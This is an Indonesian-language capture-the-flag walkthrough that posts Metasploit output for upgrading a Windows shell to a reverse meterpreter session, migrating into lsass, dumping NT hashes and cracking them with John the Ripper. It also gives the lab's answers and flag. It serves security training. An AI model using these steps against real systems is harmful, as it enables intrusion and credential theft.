klik link berikut untuk melihat cara penggunaannya disini
post/multi/manage/shell_to_meterpreter
Answer = post/multi/manage/shell_to_meterpreter
Pilih ini (gunakan MODULE_PATH). Tunjukkan opsi, opsi apa yang perlu kami ubah?
Opsi yang di ubah adalah pada sesi. Jalankan perintah brikut untuk melihat sesi:
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
Tetapkan opsi yang diperlukan, Anda mungkin perlu membuat daftar semua sesi untuk menemukan target Anda di sini.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows 10.9.169.148:4444 -> 10.10.40.203:49171 (10.10.40.203)
Lari! Jika ini tidak berhasil, coba selesaikan eksploitasi dari tugas sebelumnya sekali lagi.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.169.148:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (175174 bytes) to 10.10.40.203
[*] Meterpreter session 2 opened (10.9.169.148:4433 -> 10.10.40.203:49190) at 2021-03-01 19:40:32 +0900
[*] Stopping exploit/multi/handler
Setelah konversi shell meterpreter selesai, pilih sesi itu untuk digunakan.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Verifikasi bahwa kami telah meningkatkan ke NT AUTHORITY SYSTEM. Jalankan Getsystem untuk mengonfirmasi ini. Jangan ragu untuk membuka shell dos melalui perintah 'shell' dan jalankan 'whoami'. Ini harus mengembalikan bahwa kita memang sistem. Latar belakang shell ini setelahnya dan pilih sesi meterpreter kami untuk digunakan lagi.
meterpreter > shell Process 1312 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Windowssystem32>whoami whoami nt authoritysystem C:Windowssystem32>exit
Buat daftar semua proses yang berjalan melalui perintah 'ps'. Hanya karena kita adalah sistem, bukan berarti proses kita demikian. Temukan proses di bagian bawah daftar ini yang berjalan di NT AUTHORITY SYSTEM dan tuliskan id proses (kolom paling kiri).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32smss.exe
444 656 LogonUI.exe x64 1 NT AUTHORITYSYSTEM C:WindowsSystem32LogonUI.exe
464 704 svchost.exe x64 0 NT AUTHORITYSYSTEM
468 704 svchost.exe x64 0 NT AUTHORITYSYSTEM
556 548 csrss.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe
604 548 wininit.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32wininit.exe
616 596 csrss.exe x64 1 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe
656 596 winlogon.exe x64 1 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe
704 604 services.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32services.exe
712 604 lsass.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsass.exe
720 604 lsm.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsm.exe
816 1296 cmd.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32cmd.exe
828 704 svchost.exe x64 0 NT AUTHORITYSYSTEM
896 704 svchost.exe x64 0 NT AUTHORITYNETWORK SERVICE
944 704 svchost.exe x64 0 NT AUTHORITYLOCAL SERVICE
1064 704 svchost.exe x64 0 NT AUTHORITYLOCAL SERVICE
1120 556 conhost.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32conhost.exe
1168 704 svchost.exe x64 0 NT AUTHORITYNETWORK SERVICE
1296 704 spoolsv.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe
1332 704 svchost.exe x64 0 NT AUTHORITYLOCAL SERVICE
1404 704 amazon-ssm-agent.exe x64 0 NT AUTHORITYSYSTEM C:Program FilesAmazonSSMamazon-ssm-agent.exe
1476 704 LiteAgent.exe x64 0 NT AUTHORITYSYSTEM C:Program FilesAmazonXentoolsLiteAgent.exe
1604 556 conhost.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32conhost.exe
1612 704 Ec2Config.exe x64 0 NT AUTHORITYSYSTEM C:Program FilesAmazonEc2ConfigServiceEc2Config.exe
1940 704 svchost.exe x64 0 NT AUTHORITYNETWORK SERVICE
2072 2556 powershell.exe x86 0 NT AUTHORITYSYSTEM C:Windowssyswow64WindowsPowerShellv1.0powershell.exe
2080 828 WmiPrvSE.exe
2416 704 svchost.exe x64 0 NT AUTHORITYLOCAL SERVICE
2528 704 sppsvc.exe x64 0 NT AUTHORITYNETWORK SERVICE
2556 2052 powershell.exe x64 0 NT AUTHORITYSYSTEM C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
2568 704 vds.exe x64 0 NT AUTHORITYSYSTEM
2664 704 svchost.exe x64 0 NT AUTHORITYSYSTEM
2736 704 SearchIndexer.exe x64 0 NT AUTHORITYSYSTEM
3028 704 TrustedInstaller.exe x64 0 NT AUTHORITYSYSTEM
Migrasikan ke proses ini menggunakan perintah 'migrate PROCESS_ID' di mana id proses adalah yang baru saja Anda tulis di langkah sebelumnya. Ini mungkin membutuhkan beberapa kali percobaan, proses migrasi sangat tidak stabil. Jika ini gagal, Anda mungkin perlu menjalankan ulang proses konversi atau mem-boot ulang mesin dan memulai sekali lagi. Jika ini terjadi, coba proses lain di lain waktu.
Jalankan perintah berikut:
meterpreter > migrate 712
[ ] Migrating from 2072 to 712...
[ ] Migration completed successfully.
meterpreter >
Hapus kata sandi pengguna non-default dan pecahkan!
Di dalam shell meterpreter kami yang ditinggikan, jalankan perintah 'hashdump'. Ini akan membuang semua kata sandi di mesin selama kami memiliki hak yang benar untuk melakukannya. Apa nama pengguna non-default?
jalankan perintah berikut :
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: meterpreter >
Answer = Jon
Salin hash kata sandi ini ke file dan teliti cara memecahkannya. Apa kata sandi yang diretas?
Copy kata sandi di atas lalu buka tap terminal baru dan crack dengan john the ripper, simpan dalam satu file. Jalankan perintah berikut untuk crack:
┌─[cyber@cyber]─[~]
└──╼ $john --format=NT --wordlist=rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
alqfna22 (Jon)
2g 0:00:00:04 DONE (2021-03-01 20:20) 0.4329g/s 2207Kp/s 2207Kc/s 2208KC/s alqueva1968..alpus
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
Answer = alqfna22
Temukan tiga bendera yang ditanam di mesin ini. Ini bukan flag tradisional, melainkan dimaksudkan untuk mewakili lokasi utama dalam sistem Windows. Gunakan petunjuk yang diberikan di bawah ini untuk melengkapi ruangan ini!
Flag1? This flag can be found at the system root.
Jalankan perintah berikut:
meterpreter > pwd C:Windowssystem32 meterpreter > cd C:/ meterpreter > pwd C: meterpreter > dir Listing: C: ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2009-07-14 12:18:56 +0900 $Recycle.Bin 40777/rwxrwxrwx 0 dir 2009-07-14 14:08:56 +0900 Documents and Settings 40777/rwxrwxrwx 0 dir 2009-07-14 12:20:08 +0900 PerfLogs 40555/r-xr-xr-x 4096 dir 2009-07-14 12:20:08 +0900 Program Files 40555/r-xr-xr-x 4096 dir 2009-07-14 12:20:08 +0900 Program Files (x86) 40777/rwxrwxrwx 4096 dir 2009-07-14 12:20:08 +0900 ProgramData 40777/rwxrwxrwx 0 dir 2018-12-13 12:13:22 +0900 Recovery 40777/rwxrwxrwx 4096 dir 2018-12-13 08:01:17 +0900 System Volume Information 40555/r-xr-xr-x 4096 dir 2009-07-14 12:20:08 +0900 Users 40777/rwxrwxrwx 16384 dir 2009-07-14 12:20:08 +0900 Windows 100666/rw-rw-rw- 24 fil 2018-12-13 12:47:39 +0900 flag1.txt 0000/--------- 3996880 fif 1970-02-18 02:52:32 +0900 hiberfil.sys 0000/--------- 3996880 fif 1970-02-18 02:52:32 +0900 pagefile.sys meterpreter > cat flag1.txt flag{access_the_machine}meterpreter >
Answare = flag{access_the_machine}